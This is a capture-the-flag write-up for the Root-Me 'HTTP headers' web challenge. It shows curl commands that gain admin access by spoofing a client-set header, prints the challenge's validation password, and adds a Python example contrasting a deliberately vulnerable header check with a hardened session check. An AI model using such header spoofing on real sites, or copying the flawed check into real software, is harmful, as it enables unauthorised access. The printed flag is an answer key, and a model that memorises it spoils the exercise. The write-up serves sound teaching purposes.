Rootme HTTP headers
HTTP response give informations
The statement says “Get an administrator access to the webpage.”, which seems pretty straightforward.
We’ll curl the challenge and dump the response headers:
curl -i http://challenge01.root-me.org/web-serveur/ch5/index.php
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Nov 2017 01:25:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Header-RootMe-Admin: none
....
There’s an odd field, the one called Header-RootMe-Admin; it’s set to none.
Let’s send a request with that field set to different values. After trying a few, admin is the value that we’re looking for.
curl -H "Header-RootMe-Admin:admin" http://challenge01.root-me.org/web-serveur/ch5/index.php
...
<html>
<p>Content is not the only part of an HTTP response!</p>
<p>You dit it ! You can validate the challenge with the password HeadersMayBeUseful</p></body>
</html>
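The challenge works because the server makes an authorization decision from a request header that the client sets freely. As an added example (not the challenge's own code, which the page does not show), here is that pattern next to a check that derives the role from server-side session state; the function names, the session cookie format and the in-memory store are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets

# Constructed server-side state for the demo (all names are hypothetical).
SESSION_KEY = secrets.token_bytes(32)   # secret that never leaves the server
SESSIONS = {}                           # session id -> role, stored server-side


def is_admin_vulnerable(headers):
    """Flawed pattern: the role is read from a header the client controls."""
    return headers.get("Header-RootMe-Admin", "none") == "admin"


def _sign(session_id):
    """HMAC over the session id so a client cannot mint its own token."""
    return hmac.new(SESSION_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def issue_session(role):
    """Run after a real login: the role is recorded on the server only."""
    session_id = secrets.token_hex(16)
    SESSIONS[session_id] = role
    return f"{session_id}.{_sign(session_id)}"


def is_admin_hardened(headers):
    """Role comes from server-side state keyed by a signed session id."""
    name, _, token = headers.get("Cookie", "").partition("=")
    if name != "session":
        return False
    session_id, _, mac = token.partition(".")
    # Constant-time comparison; bytes avoid errors on non-ASCII input.
    if not session_id or not hmac.compare_digest(
        mac.encode(), _sign(session_id).encode()
    ):
        return False
    # Any client-supplied role header is ignored entirely.
    return SESSIONS.get(session_id) == "admin"


if __name__ == "__main__":
    spoofed = {"Header-RootMe-Admin": "admin"}   # constructed request headers
    print("vulnerable check:", is_admin_vulnerable(spoofed))
    print("hardened check:  ", is_admin_hardened(spoofed))
```
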